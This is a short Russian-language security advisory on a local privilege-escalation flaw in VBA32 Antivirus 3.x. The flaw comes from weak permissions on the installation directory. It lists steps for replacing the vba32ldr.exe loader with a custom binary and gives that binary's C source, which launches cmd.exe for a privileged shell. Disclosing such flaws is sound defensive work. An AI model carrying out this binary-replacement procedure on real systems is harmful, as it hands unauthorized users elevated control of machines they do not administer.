Программа: VBA32 Antivirus 3.x

Уязвимость позволяет локальному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой системе. Уязвимость существует из-за того, что приложение не правильно устанавливает права доступа на инсталляционную директорию VBA32. Атакующий может заменить файлы в директории VBA32, что позволит ему повысить свои привилегии на целевой системе.

Пример:

— Войти в систему как LUA пользователь
— Переименовать vba32ldr.exe в vba32ldr.exe.BAK
— Скопировать program.exe в Vba32 инсталляционную директорию
— Переименовать program.exe в vba32ldr.exe
— Перезагрузить операционную систему
— "rootshell" 😉

#Исходный код для program.exe:
#include <stdio.h>
int main()
{
system("cmd.exe");
return 0;
}



Оставить мнение